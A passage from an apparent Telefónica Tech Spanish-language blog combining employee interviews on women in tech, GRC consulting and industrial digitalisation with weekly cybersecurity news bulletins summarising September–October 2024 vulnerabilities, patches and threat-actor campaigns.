trayectoria profesional, he tenido la oportunidad de trabajar en entornos muy diversos, desde una gran compañía multinacional hasta el ámbito educativo. El contacto con diferentes personas y los diversos desafíos a los que me he enfrentado en cada entorno me han permitido crecer y evolucionar, adquiriendo un amplio conocimiento multidisciplinar y desarrollando habilidades que aplico en mi día a día. Valoro especialmente habilidades blandas como la comunicación efectiva y la colaboración con equipos multiculturales. En mi puesto en Telefónica Tech, utilizo competencias como la gestión estratégica, el análisis y la resolución de problemas, y la capacidad para adaptarme a situaciones cambiantes. Enfrentar desafíos que van más allá del conocimiento técnico requiere también habilidades de gestión y la capacidad para diseñar estrategias eficaces. Además, valoro especialmente las habilidades blandas, como la comunicación efectiva y la colaboración con equipos multiculturales, fundamentales para garantizar que nuestras soluciones se implementen con éxito en diferentes regiones a nivel global. Katterine se especializó en el ámbito de la Ciberseguridad. ¿Cómo concilias tu trabajo con tu vida personal? Conciliar la vida laboral y personal siempre representa un reto, pero considero que es fundamental mantener un buen equilibrio. Organizo mi tiempo de manera eficiente, estableciendo prioridades claras tanto en el trabajo como en mi vida personal. Gracias al equipo y al ambiente colaborativo en Telefónica y a la flexibilidad que nos brinda la empresa es posible maximizar la productividad y trabajar de manera más eficiente. Creo firmemente en la importancia de desconectar y dedicar tiempo a mis actividades personales, familia y amigos, lo cual me ayuda a recargar energías y regresar al trabajo con una mejor actitud y motivación. ¿Cómo promueve Telefónica Tech la diversidad de género y la inclusión? Telefónica Tech es un excelente lugar de trabajo para las mujeres porque impulsa la diversidad y la inclusión en todos los niveles de la organización. La empresa cuenta con políticas y programas específicos para garantizar la igualdad de oportunidades, como el desarrollo de planes de carrera, mentorías y formación especializada en tecnología. Además, fomenta un ambiente laboral inclusivo donde la diversidad es valorada como una fortaleza clave para la innovación y el éxito. Estas acciones no solo logran que las mujeres se sientan apreciadas y respetadas, sino que también contribuyen a crear una cultura organizacional más inclusiva y diversa. ¿Podrías explicarnos qué significa para ti la iniciativa #WomenWithTech? #WomenWithTech representa una oportunidad para empoderar y visibilizar a las mujeres en el sector tecnológico. Para mí, significa abrir puertas, brindar oportunidades y crear un espacio más equitativo, donde las mujeres puedan desarrollar todo su potencial. Esta iniciativa busca promover la igualdad de género, inspirar a las futuras generaciones de mujeres a perseguir carreras STEAM (Ciencia, Tecnología, Ingeniería, Artes y Matemáticas), derribando estereotipos, apoyando el desarrollo profesional y fomentando una cultura de inclusión que valore la diversidad de perspectivas. La iniciativa #WomenWithTech inspira y apoya a más mujeres a ser parte activa de la transformación tecnológica. ¿Qué aportan las mujeres a las profesiones STEAM? Las mujeres aportamos una perspectiva valiosa y única en las profesiones STEAM (Ciencia, Tecnología, Ingeniería, Artes y Matemáticas), enriqueciendo estos campos con diversidad de ideas y soluciones innovadoras. Nuestras diferentes experiencias y contextos nos permiten abordar problemas desde múltiples ángulos, lo que fomenta la creatividad y potencia el avance y la innovación. Nuestra participación también impulsa la equidad y la inclusión, desafiando los estereotipos de género y sirviendo de inspiración para que las futuras generaciones de niñas se interesen por estas áreas. La diversidad en los equipos tecnológicos es esencial para crear productos y soluciones que reflejen mejor las necesidades y realidades de la sociedad, lo que nos ayuda a construir un futuro más inclusivo y sostenible. ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM? Mi consejo para las mujeres que desean emprender una carrera STEAM es que confíen plenamente en sus capacidades. Algunos desafíos pueden parecer abrumadores, pero lo que realmente marca la diferencia es la actitud y el esfuerzo que ponemos al enfrentarlos. Cada obstáculo es una oportunidad para aprender y desarrollarse profesionalmente. ¿Qué habilidades son necesarias para tener éxito en el sector de la tecnología? Considero que la resiliencia y la capacidad de adaptación son esenciales para afrontar los constantes cambios y desafíos del sector tecnológico. Es crucial contar con habilidades técnicas sólidas para tener una visión integral, pero igualmente importantes son las habilidades blandas, como la comunicación efectiva, el trabajo en equipo y el pensamiento crítico. Estas competencias no solo permiten resolver problemas de forma creativa, sino que también facilitan la colaboración en entornos diversos, aspectos clave para crecer y desarrollarte en el ámbito tecnológico. La resiliencia y la capacidad de adaptación son esenciales para afrontar los constantes cambios y desafíos del sector tecnológico. * * * Telefónica Tech #WomenWithTech: Voces inspiradoras en un mundo digital 8 de marzo de 2024
17 de octubre de 2024
“Es imprescindible alinear la tecnología con el negocio gestionando los riesgos y asegurando el cumplimiento”. Eduard Chaveli, Govertis
Eduard Chaveli es Head of Consulting Strategy de Govertis, parte de Telefónica Tech, y un pionero en el campo del Derecho de las TI en España. Es una figura clave en el desarrollo de soluciones tecnológicas y legales en el ámbito de la protección de datos y de la seguridad de la información. * * * ¿Cómo ha evolucionado Govertis desde su fundación y qué supone formar parte de Telefónica Tech? Govertis ha evolucionado partiendo de ser especialista en una materia como la protección de datos de carácter personal a ser una consultora que ofrece una solución integral en todo lo relativo a Gobernanza, Riesgos y Cumplimiento (GRC). Alineamos las tecnologías digitales y de la información con los objetivos empresariales y de negocio, gestionando los riesgos y asegurando el cumplimiento normativo TI. Esto incluye la seguridad de la información como parte nuclear. Formar parte de Telefónica Tech nos permite ofrecer ese servicio integral, end-to-end, con una solución que no solo es completa respecto de los servicios GRC en materia TI, sino que junto con el resto del porfolio de Telefónica Tech ofrece al cliente una solución completa. ¿En qué nos diferenciamos de otras consultoras? Además de ese servicio integral que podemos ofrecer a los clientes porque somos parte de Telefónica Tech, las principales diferencias que tenemos respecto de otras consultoras son: La calidad profesional de sus integrantes, en un equipo muy especializado en la materia, donde el conocimiento fluye y va permeando hasta llegar a cada integrante. El trato personalizado que damos a cada cliente, gracias precisamente a la calidad de nuestros profesionales. Nuestra meta es continuar creciendo en cifras sin dejar de perder ni la calidad humana y profesional del equipo ni ese trato personal al cliente. ¿Podrías hablarnos de algún caso concreto en el que gracias al binomio entre Govertis y Telefónica Tech hayamos generado valor diferencial para los clientes? Tenemos múltiples casos de clientes en los que aseguramos el Gobierno de la Ciberseguridad y la Privacidad de las soluciones y servicios que proporcionamos desde Telefónica Tech. Tanto en proyectos de implementación de soluciones tecnológicas, como en oficinas técnicas que acompañan al cliente en su proceso de transformación. En Ciberseguridad, un ejemplo muy claro es el de la gestión de incidentes de seguridad. A los clientes que sufren un incidente de seguridad lo que en primera instancia les preocupa es la parte operativa: que sus sistemas sigan funcionando para mantener la continuidad de su negocio. Eduard dirige y es ponente habitual en numerosos masters y cursos en el ámbito del Derecho TI. Pero, además de la parte de operaciones, también hay exigencias derivadas de diferentes normas (legislación de protección de datos de carácter personal, Esquema Nacional de Seguridad, Infraestructuras Críticas, etc.) que imponen determinadas obligaciones tanto antes, durante, como después del incidente. Como consultora, ¿cuál es la estrategia para mantenerse a la vanguardia en un sector tan dinámico como el tecnológico? Efectivamente es un sector muy dinámico porque a los cambios en las tecnologías se añade el lógico y consecuente de la modificación de la normativa que las regula. Esto nos exige: Por un lado, dividirnos en Centros de Competencia que permiten agrupar a las personas en torno a diferentes marcos normativos y servicios y así ordenar el conocimiento y ponerlo a disposición de desarrollo de negocio y de los proyectos. Son estos Centros de Competencia quienes se encargan de mantener actualizado el porfolio de los servicios vinculados a los mismos. Por otro lado, una gran inversión en la formación de las personas para garantizar que dicho conocimiento llega a cada uno de ellos que son nuestra cara y voz ante el cliente. Tenemos un acuerdo de colaboración con la Asociación Española de la Calidad (AEC) que nos permite formar parte de un ecosistema de formación continua. ¿Cuáles consideras que son los desafíos que enfrentan las empresas, incluyendo los cambios regulatorios y cómo ayudamos desde Telefónica Tech a superarlos? Las empresas se enfrentan a un mundo cada vez más digitalizado, con mayores oportunidades, pero también con mayores riesgos y exigencias de cumplimiento en el ámbito TI. Para abordar estos riesgos las empresas necesitan especialistas con experiencia en el ámbito de la consultoría en GRC en marcos TI como es nuestro caso, que entendamos las necesidades del negocio y las alineamos con las exigencias de cumplimiento. A la vez, al formar parte de Telefónica Tech, podemos ofrecer al cliente una solución integral. Entendemos las necesidades de los negocios y las alineamos con las exigencias de cumplimiento. ¿Cómo está impactando la inteligencia artificial en la gobernanza, riesgo y cumplimiento (GRC y seguridad de la información) y qué servicios prestamos en este ámbito? Por un lado, la Inteligencia Artificial permite que los servicios de consultoría (como también los de operaciones, los productivos o los de negocio) se puedan prestar de forma más efectiva y con menos recursos. Por otro lado, y esto es en lo que nos enfocamos desde el equipo Govertis, part of Telefónica Tech, es necesario conciliar las grandes oportunidades que trae la IA con el cumplimiento normativo y la seguridad de la información. Para esto prestamos servicios que incluyen la formación y sensibilización especializada en marcos normativos aplicables a la IA, la consultoría sobre regulación y casos de uso de la IA en las organizaciones o la específica de la gobernanza sobre gestión de la IA. También proyectos de consultoría, implantación y acompañamiento en la certificación de sistemas de gestión Inteligencia Artificial conforme a la ISO 42001 (SGIA). Hay que conciliar las grandes oportunidades que trae la IA con el cumplimiento normativo y la seguridad de la información. ¿Qué importancia tiene hoy la figura del CISO y cómo estamos apoyando a estos profesionales en su labor diaria? La figura del CISO, director de seguridad de la información, es fundamental hoy en día en las organizaciones por diferentes motivos. Entre ellos, porque vivimos en un mundo cada vez más digitalizado en que la información es un activo esencial y el CISO es el responsable de proteger dichos datos contra amenazas y asegurar la continuidad del negocio. Asimismo, el CISO desarrolla e implementa la estrategia de seguridad alineándola con los objetivos empresariales, asegurando el cumplimiento de la normativa TI (juntamente con otros roles, como por ejemplo el DPO); y sin olvidar que es él quien lidera la respuesta ante incidentes de seguridad, de nuevo coordinado con otros roles. El CISO desarrolla e implementa la estrategia de seguridad, asegura el cumplimiento normativo y lidera la respuesta ante incidentes de seguridad. Por un lado, ofrecemos servicios de consultoría especializada de soporte externo al CISO en cada una de sus funciones; y, por otro lado, a las organizaciones que lo requieren, se les ofrece el servicio de CISO as a service, un modelo que permite a las empresas contar con un director externo. Dada su importancia es importante señalar que desde Telefónica Tech y junto con la Asociación Española de la Calidad (AEC), hemos creado el Club del CISO que, junto con el ya histórico Club del DPD y ahora el Foro de GRC en IA, constituyen el mayor ecosistema en GRC pensado para los profesionales de este ámbito.
15 de octubre de 2024
Boletín de Ciberseguridad, 5 - 11 octubre
Salt Typhoon accedió al sistema de escucha telefónica de los tribunales de EE UU Una investigación publicada por Wall Street Journal ha revelado que la amenaza persistente avanzada (APT) china Salt Typhoon, también conocida como FamousSparrow y GhostEmperor, logró acceder a los sistemas que el gobierno federal de Estados Unidos emplea para realizar escuchas telefónicas autorizadas por los tribunales del país. El medio de comunicación informó de que el actor de amenazas comprometió las redes de los proveedores de banda ancha Verizon, AT&T y Lumen Technologies para recopilar datos de tráfico de Internet de empresas y ciudadanos, aunque no especificó los detalles del ataque y el alcance de los datos comprometidos. Más info Corregidas varias vulnerabilidades en la solución Expedition de Palo Alto Networks Palo Alto ha corregido cinco vulnerabilidades en su solución Expedition que podrían permitir secuestrar cortafuegos PAN-OS. Además, existen dos PoC publicadas, si bien no se habrían detectado evidencias de explotación activa. Los fallos se corresponden con: una inyección de comandos no autenticada (CVE-2024-9463, CVSSv3 de 9.9), una inyección de comandos autenticada (CVE-2024-9464, CVSSv3 de 9.3 y para la que se publicó la segunda PoC indicada), una inyección SQL no autenticada (CVE-2024-9465, CVSSv3 de 9.2), credenciales en texto claro almacenadas en registros (CVE-2024-9466, CVSSv3 de 8.2) y un fallo XSS reflejado no autenticado (CVE-2024-9467, CVSSv3 7). Combinados, permitirían a un atacante leer el contenido de la base de datos de Expedition y archivos arbitrarios, así como escribir archivos arbitrarios. Todos los fallos han sido corregidos en la versión 1.2.96 de Expedition y superiores. Más info La justicia estadounidense desmantela la infraestructura de Star Blizzard La Unidad de Crímenes Digitales (DCU) de Microsoft junto con el Departamento de Justicia de EE. UU. han llevado a cabo una operación en la que han desmantelado más de 100 dominios vinculados al actor de amenazas Star Blizzard. Esta Amenaza Persistente Avanzada (APT), también conocida como Cold River o Callisto, llevaría activa desde 2017, realizando ataques de phishing y desplegando backdoors personalizadas. En concreto, de acuerdo con el artículo publicado por Microsoft, desde 2023 este grupo habría atacado a más de 30 organizaciones del sector sociedad civil, incluyendo Organizaciones No Gubernamentales (ONG), periodistas y grupos de reflexión. Más info Patch Tuesday de Microsoft: actualizados 118 fallos de seguridad y cinco zero-days Microsoft ha publicado el aviso correspondiente al Patch Tuesday del mes de octubre, que incluye actualizaciones de seguridad para 118 fallos. Entre estos, se observan cinco vulnerabilidades zero-day, de las cuales dos habrían sido explotadas activamente. Asimismo, el aviso soluciona tres fallos de ejecución remota de código: CVE-2024-43468, CVSSv3 de 9.8 según fabricante; CVE-2024-43488, CVSSv3 de 8.8 según Microsoft; y CVE-2024-43582, CVSSv3 de 8.1 según fabricante. Con respecto a los fallos activamente explotados, estos se corresponden con una vulnerabilidad de suplantación de la plataforma MSHTML de Windows (CVE-2024-43573, CVSSv3 de 6.5 según Microsoft) y una vulnerabilidad de ejecución remota de código en la consola de administración de Microsoft (CVE-2024-43572, CVSSv3 de 7.8 según Microsoft). La primera podría tratarse de un bypass de una vulnerabilidad anterior que falseaba las extensiones de los archivos al abrirlos, mientras que la segunda permite que archivos maliciosos de Microsoft Saved Console (MSC) ejecuten código remoto en dispositivos infectados. Más info Detectada una campaña de phishing empleando Mamba 2FA Los investigadores de Sekoia Blog han publicado un artículo detallando una nueva campaña de phishing en la que el actor malicioso empleaba la herramienta Mamba 2FA. La campaña fue detectada en mayo de 2024, ofreciendo a los atacantes un mecanismo de adversary-in-the-middle (AiTM) que puede ser empleado para saltarse la protección de la autenticación multifactor (MFA) mediante la captura de los tokens de autenticación de las víctimas. Asimismo, Mamba 2FA es compatible con Entra ID, AD FS, proveedores de SSO de terceros y cuentas de consumidores de Microsoft, pudiendo reflejar la página de inicio de sesión personalizada de cada organización. Los investigadores destacan que la herramienta es comercializada en Telegram mediante un modelo de Phishing-as-a-Service. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
11 de octubre de 2024
Boletín de Ciberseguridad, 28 septiembre - 4 octubre
Storm-0501 expande sus ataques a entornos de cloud con el ransomware Embargo El equipo de investigadores de Microsoft ha publicado una investigación en la que identificado que el actor Storm-0501 utiliza el ransomware embargo contra entornos cloud. Según los expertos, Storm-0501 habría estado atacando a organizaciones de diferentes sectores como gubernamental, industrial, transporte y autoridades judiciales de EE. UU. Dicho actor obtiene acceso a entornos en la nube explotando credenciales débiles y aprovechando cuentas privilegiadas, con el objetivo de robar datos y ejecutar una carga útil de ransomware. En concreto, obtiene acceso inicial a la red con credenciales robadas o compradas, o explotando vulnerabilidades como CVE-2022-47966, CVSSv3 de 9.8, CVE-2023-4966, CVSSv3 de 7.5 según fabricante, y, posiblemente, CVE-2023-29300, CVSSv3 de 9.8 o CVE-2023-38203 CVSSv3 de 9.8. Asimismo, utiliza herramientas como Impacket y Cobalt Strike para moverse lateralmente, roba datos a través de un binario Rclone personalizado y evade soluciones de seguridad con cmdlets de PowerShell. Más info Pure Storage parchea cinco vulnerabilidades críticas Pure Storage ha publicado nuevos parches que corrigen cinco nuevas vulnerabilidades de severidad crítica que afectarían a los sistemas de almacenamiento FlashArray y FlashBlade. En concreto, la empresa ha informado acerca de dos fallos con CVSSv3 10 según proveedor, CVE-2024-0001 y CVE-2024-0002. Mientras que la primera permitiría a un atacante con una cuenta con configuración local activa escalar privilegios, la segunda sería un fallo de acceso remoto mediante el uso de cuentas con privilegios altos. Asimismo, las otras tres vulnerabilidades presentan un CVSSv3 de 9.1 según Pure Storage, y serían las denominadas CVE-2024-0003, que permitiría crear cuentas con privilegios mediante servicios de administración remotos, CVE-2024-0004, que puede permitir la ejecución de código, y CVE-2024-0005, que puede ser explotada para ejecutar comandos remotos mediante configuraciones SNMP personalizadas. Más info La compañía Rackspace sufre un incidente de seguridad La compañía Rackspace ha confirmado haber sufrido un incidente de seguridad que habría propiciado el compromiso de datos que afectan a varios de sus clientes. En concreto, el incidente se habría realizado debido a que un actor malicioso ha explotado una vulnerabilidad 0-day de ejecución de código remoto en una herramienta de terceros utilizada en la plataforma ScienceLogic SL1. Cabe indicar que desde la compañía no se ha dado detalle del activo afectado, a fin de evitar que otros actores aprovechen la vulnerabilidad, no obstante, han desarrollado medidas de seguridad para implementar en todos los clientes a fin de que no vuelva a suceder. En un comunicado enviado al medio digital Bleeping Computer la compañía señala que se accedió de forma indebida a información de monitoreo de rendimiento limitada con baja sensibilidad de seguridad. Más info Técnica de ataque utilizando VS Code para conseguir acceso remoto El equipo de investigadores de Cyble ha publicado una investigación en la que han identificado a actores maliciosos utilizando VS Code para obtener acceso no autorizado en las redes de sus víctimas. Las operaciones comienzan con la distribución de un archivo .lnk que posiblemente es remitido, de forma adjunta, mediante mensajes de phishing. Una vez se ejecuta por parte de la víctima, dicho archivo descarga un paquete de Python que se utiliza para ejecutar un script que elude soluciones de seguridad y sirve para establecer persistencia. Posteriormente, se crea un túnel remoto utilizando VS Code y envía un código de activación al actor para facilitar el acceso remoto no autorizado en el equipo. En último lugar, cabe indicar que esta metodología de ataque ha sido observada utilizada por parte de la APT china Stately Taurus, también conocida como Mustang Panda. Más info Vulnerabilidad CosmicSting activamente explotada Investigadores de Sansec han detectado múltiples ataques dirigidos a webs de e-commerce que utilizan Adobe Commerce y Magento aprovechando la explotación del fallo CosmicSting. La vulnerabilidad, identificada como CVE-2024-34102, CVSSv3 de 9.8, es un fallo de divulgación de información que, encadenado con CVE-2024-2961, podría permitir a un atacante ejecutar código remoto en un servidor vulnerable. Los ataques estarían produciéndose desde junio de 2024, observándose miles de tiendas vulneradas entre las que se encuentran Whirlpool, Ray-Ban, National Geographic, Segway y Cisco. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
4 de octubre de 2024
Boletín de Ciberseguridad, 21 - 27 septiembre
Necro infecta 11 millones de dispositivos Android a través de Google Play El equipo de Kaspersky ha publicado una investigación en la que señala que el malware Necro habría infectado 11 millones de dispositivos de Android a través de dos aplicaciones alojadas en Google Play. En concreto, la primera de las aplicaciones se trataría de Wuta Camera de Benqu, con más de 10 millones de descargas, es una herramienta de edición de fotografías cuyas versiones 6.3.2.148 hasta la 6.3.6.148 contendría software malicioso, mientras que la otra, WA message recover-wamr con 1 millón de descargas, hasta su última versión 1.2.0 estaría infectada. Cabe indicar que ambas aplicaciones legítimas fueron infectadas por un SDK publicitario y desde Google están investigando estos hechos tras el aviso de Kaspersky. En cuanto a Necro, destaca por ser un loader que descarga payload maliciosos mediante esteganografía, además puede ejecutar archivos DEX, instalar aplicaciones, acceder al dispositivo de la víctima, contratar suscripciones de pago, así como abrir enlaces y ejecutar código JavaScript. Más info Denuncian a Mozilla por activar función en Firefox sin consentimiento El grupo noyb ha presentado una denuncia contra Mozilla ante el organismo de protección de datos de Austria, alegando que la empresa rastrea el comportamiento en línea de los usuarios de Firefox sin su consentimiento mediante la función Privacy-Preserving Attribution (PPA). Esta función, activada automáticamente en la versión 128 del navegador, fue diseñada en colaboración con Meta y permite medir la efectividad de los anuncios sin que los sitios web recopilen datos personales. Sin embargo, noyb sostiene que el rastreo ocurre dentro del propio Firefox, lo que vulnera el Reglamento General de Protección de Datos (RGPD) de la UE. Mozilla por su parte, afirma que esta función mejora la privacidad del usuario al permitir medir el rendimiento de los anuncios sin que los sitios web individuales recopilen datos personales y asegura que PPA no comparte información personal ni rastrea a los usuarios. Aunque PPA se puede desactivar, la denuncia surge porque la función se activó por defecto sin consultar previamente a los usuarios. Más info Detectado el malware SnipBot, una nueva versión de RomCom Investigadores de Unit 42 han observado una nueva versión de la familia de malware RomCom denominada SnipBot. Se trata de un troyano de acceso remoto desarrollado en C++ que ofrece al atacante la capacidad de ejecutar comandos y descargar diversos módulos en el sistema de la víctima, entre otras funcionalidades. RomCom se encuentra activo desde, al menos, 2022 y se ha utilizado en ataques de ransomware, así como para la extorsión y recopilación selectiva de credenciales. En el caso de SnipBot, la cepa consta de varias etapas en las que la carga útil inicial es siempre un descargador ejecutable y el resto son ficheros EXE o DLL destinados a realizar tareas de descubrimiento, así como a extraer ficheros e información de la víctima y los sistemas infectados. El descargador contaría con un certificado de firma de código válido y legítimo, mientras que los módulos posteriores no estarían firmados. En adición, SnipBot utiliza técnicas de ofuscación personalizadas y antianálisis para dificultar su detección y análisis. Más info Vulnerabilidad crítica TOCTOU detectada en productos NVIDIA Investigadores de Wiz han detectado una vulnerabilidad crítica TOCTOU (Time-of-check Time-of-Use) en el Container Toolkit 1.16.1 de NVIDIA. El fallo, identificado como CVE-2024-0132 y con una puntuación CVSSv3 de 9, expone los entornos en la nube a ataques de divulgación de información, denegación de servicio, escalada de privilegios, ejecución de código y manipulación de datos cuando el Container se utiliza con la configuración predeterminada. Una imagen de contenedor creada específicamente podría permitir a un atacante escapar de los contenedores y tomar el control del sistema anfitrión subyacente. Asimismo, los investigadores han señalado que la vulnerabilidad es especialmente peligrosa en entornos multiusuario y orquestados, en los cuales las GPU se comparten entre cargas de trabajo y podría comprometerse a distintos servicios. ✅ El fabricante ha indicado que los usuarios deberán actualizar a la versión 1.16.2 de Container Toolkit y NVIDIA GPU Operator para mitigar el fallo y reducir el riesgo de exposición. Más info UNC1860 opera como facilitador de acceso inicial en ciberoperaciones en Oriente Medio Una investigación de Mandiant reveló que UNC1860, un grupo APT vinculado al Ministerio de Inteligencia y Seguridad de Irán, podría estar operando como proveedor de acceso inicial, facilitando intrusiones en redes de alto valor en Oriente Medio, como las gubernamentales y de telecomunicaciones. Desde su aparición en 2022, UNC1860 ha estado relacionado con ataques destructivos en Albania e Israel, utilizando ransomware y wipers. El grupo emplea herramientas especializadas como TEMPLEPLAY y VIROGREEN para mantener acceso remoto y persistente en redes comprometidas. Además, comparte vínculos con APT34, otro grupo iraní. Sus ataques comienzan aprovechando vulnerabilidades en servidores, desplegando malware como STAYSHANTE y TEMPLEDOOR, y posteriormente realizan actividades de post-explotación. UNC1860 cuenta con un arsenal variado de herramientas para el movimiento lateral, la recopilación de información y la evasión de defensas, lo que lo convierte en un activo clave para los intereses de Irán en la región. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
27 de septiembre de 2024
Boletín de Ciberseguridad, 14 - 20 septiembre
Docker parchea dos vulnerabilidades, una de ellas crítica Docker ha publicado un nuevo aviso de seguridad en el que indica haber parcheados dos nuevas vulnerabilidades en versiones de Docker Desktop anteriores a la 4.32.2. En concreto, los fallos serían CVE-2024-8695, y CVE-2024-8696, CVSSv4 9.0 y 8.9 según proveedor, y afectarían a la forma en la que Docker gestiona los registros de cambios, las URL de los editores y las descripciones de las extensiones. Al explotar estos fallos, un atacante podría usar la aplicación para ejecutar código arbitrario en el sistema de la víctima. Asimismo, actores maliciosos podrían explotar ambos fallos para conseguir acceso a datos sensibles, instalar malware e incluso tomar el control del sistema afectado. ✅ Docker ha instado a sus usuarios a que instalen con la mayor brevedad posible la versión 4.32.2, actualización en la que se incluyen los parches de estos dos fallos. Más info Detectada una campaña de distribución de malware con afectación a Binance Binance ha publicado un aviso alertando a sus clientes de que actores maliciosos están llevando a cabo una campaña de distribución del malware Clipper, con el fin de manipular direcciones de retiro durante procesos de transacción para robar criptodivisas. El malware intercepta los datos almacenados en el portapapeles. De este modo, Clipper sustituye la dirección original por una designada por el atacante cuando un usuario copia y pega una dirección de monedero para transferir criptodivisas, enviando el dinero a la cartera del actor de amenazas. Clipper se distribuye habitualmente a través de complementos y aplicaciones no oficiales en dispositivos Android. La compañía no ha indicado por el momento cuánto dinero ha sido extraído ni cuántas personas se han visto afectadas. ✅ Binance recomienda a los usuarios verificar las direcciones, así como la autenticidad de las aplicaciones descargadas, en adición al uso de software de seguridad actualizado en sus dispositivos. Más info Vulnerabilidad activamente explotada en Ivanti Ivanti ha emitido un aviso de seguridad en el que señala que una vulnerabilidad crítica que afecta a Cloud Service Appliance (CSA) ha sido explotada activamente. En concreto, el fallo de seguridad al que se hace referencia es el registrado como CVE-2024-8963, CVSSv3 de 9.4 según fabricante, el cual se debe a una omisión de administración causada por una debilidad de cruce de ruta. Cabe destacar que su aprovechamiento podría permitir a atacantes remotos no autenticados acceder a funciones restringidas en sistemas CSA vulnerables. Asimismo, cabe indicar que dicha vulnerabilidad está siendo explotada mediante la concatenación del aprovechamiento de otro fallo de seguridad, el cual es CVE-2024-8190, CVSSv3 de 7.2 según fabricante, que sirve para para eludir la autenticación de administrador y ejecutar comandos arbitrarios. ✅ Ivanti recomienda actualizar a la versión 5.0 de CSA. Más info Identificadas más de 1 000 instancias de ServiceNow exponiendo información El equipo de investigadores de AppOmni ha publicado un informe en el que afirman haber identificado más de 1 000 instancias empresariales de ServiceNow mal configuradas que exponen información. En concreto, según los investigadores, los datos expuestos se tratarían de identificación personal, credenciales de usuario y tokens de acceso, entre otros. Esto pone de relieve la mala aplicación de las actualizaciones de ServiceNow en 2023, que tuvieron como objetivo mejorar las listas de control de acceso pero que no se aplicaron a las que emplean la función de base de conocimiento. AppOmni afirma que la mayoría de las bases de conocimientos de ServiceNow utilizan el sistema de permisos de criterios de usuario en lugar de listas de control de acceso, lo que hace que la actualización sea menos útil. ✅ Los investigadores recomiendan proteger las bases de conocimientos estableciendo los “Criterios de usuario” adecuados (Puede leer/No puede leer) y bloqueando a todos los usuarios no autorizados. Más info Operadores de ransomware utilizan Microsoft Azure en sus operaciones El equipo de investigadores de modePUSH han realizado una investigación en la que señalan que familias de ransomware como BianLian y Rhysida utilizan activos como Azure Storage Explorer y AzCopy de Microsoft en sus operaciones. En concreto, los expertos señalan que operadores de estos ransomware almacenan los datos robados de sus víctimas en un contenedor Azure Blob en la nube, desde donde luego pueden transferirlos a sus propios activos. Esto es debido a que al ser Azure un servicio empresarial de confianza que suelen utilizar las empresas es poco probable que los firewalls y las herramientas de seguridad corporativas bloqueen este tráfico. Además, Azure permite manejar grandes volúmenes de datos no estructurados, por lo que acelera el proceso de exfiltración. ✅ Como medida de prevención se recomienda marcar la opción Cerrar sesión al salir a fin de evitar que los atacantes utilicen la sesión activa para el robo de archivos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
20 de septiembre de 2024
“Cada empresa productora debe digitalizarse de manera adecuada a sus circunstancias, objetivos y necesidades.” Darío Cesena, Geprom
¿Qué motivó la creación de Geprom y cuál es su propósito? Geprom Connecting Industries nació en 2018 con el objetivo de ofrecer soluciones tecnológicas avanzadas en el ámbito de la automatización industrial, la digitalización de procesos y la integración de sistemas. Queríamos cubrir la necesidad existente en numerosos sectores de integrar tecnologías digitales en sus líneas de producción y operaciones, para ser más eficientes y sostenibles. Hoy, como Geprom part of Telefónica Tech desde 2021, somos una firma de ingeniería de espíritu innovador y dinámico dedicada al desarrollo e integración de soluciones tecnológicas de alto valor en el ámbito de la industria y las infraestructuras, apalancándonos en el binomio tecnología-personas. ¿Cómo os adaptáis a las necesidades de cada cliente? Entendemos que cada empresa, del tamaño y sector que sea, pone en marcha su proceso de digitalización de un modo particular y único, adecuado a sus propias circunstancias, objetivos y necesidades. Siempre integrando y adaptando su modelo de negocio a personas, datos, máquinas y procesos. Sobre esta base acompañamos a nuestros clientes ofreciendo de forma integral las soluciones, servicios y productos adecuados para hacer realidad su transformación digital, acompañándolos a lo largo de todo el camino que requiere esta revolución. La innovación es uno de nuestros pilares estratégicos, y buscamos ofrecer soluciones que aporten valor diferencial a nuestros clientes. Tras la adquisición por Telefónica Tech, ¿cuáles han sido los cambios más significativos que ha experimentado Geprom? La integración en Telefónica Tech nos permite combinar nuestra experiencia y soluciones tecnológicas con su infraestructura, capacidades y propuesta de valor. Por ello, nuestra oferta global de servicios es más completa y robusta, potenciando nuestra capacidad conjunta para ofrecer soluciones integrales de digitalización y automatización, a nivel nacional e internacional. También nos ha permitido posicionarnos como un proveedor integral único para la industria, abarcando desde la consultoría y diseño de soluciones hasta la implementación y soporte continuo. Esto incluye servicios como la automatización y digitalización de procesos, Inteligencia Artificial (IA), Internet de las Cosas (IoT), Ciberseguridad y Cloud, entre otros. Además, la integración con Telefónica Tech nos permite fortalecer enormemente nuestro alcance comercial, consiguiendo así una capacidad y posicionamiento inimaginable para Geprom y expandiendo nuestra presencia a nuevos mercados. Actualmente, en el entorno competitivo en el que nos encontramos, esto es un gran diferenciador para impulsar la digitalización de las fábricas españolas. Darío en las oficinas de Telefónica Tech en Distrito Telefónica, Madrid. ¿Qué desafíos y oportunidades ha supuesto para Geprom formar parte de Telefónica Tech? Supone tanto desafíos como oportunidades. Entre los desafíos, hemos tenido que adaptarnos a los estándares y procesos de una multinacional cotizada, lo cual ha requerido un esfuerzo considerable de alineación y formación a nivel de operaciones y comercial. El otro gran desafío para Geprom ha sido ser capaces de atender la demanda que genera la enorme fuerza comercial de Telefónica, cumpliendo a la vez con el objetivo común de acompañar y satisfacer siempre al cliente. A la vez, las oportunidades han sido inmensas. Sobre todo a nivel comercial. El crecimiento que ha vivido Geprom ha sido posible gracias a que hemos sido capaces de asumir esa capilaridad y fuerza comercial. Eso nos ha permitido diversificarnos tanto sectorial como territorialmente, clave para la escalabilidad del negocio. Además, esta integración nos permite estar a la vanguardia de la tecnología y ofrecer a nuestros clientes un valor superior gracias a la propuesta de valor tan especializada y amplia de Telefónica Tech. Todo esto, unido a las capacidades globales de Grupo Telefónica, nos permite ser un integrador tecnológico diferencial para nuestros clientes. Nuestra propuesta de valor global incluye capacidades avanzadas en IA y datos, conectividad OT y Ciberseguridad industrial. ¿Podrías hablarnos de algún caso concreto en el que el binomio entre Geprom y Telefónica Tech haya generado valor diferencial para los clientes? Uno 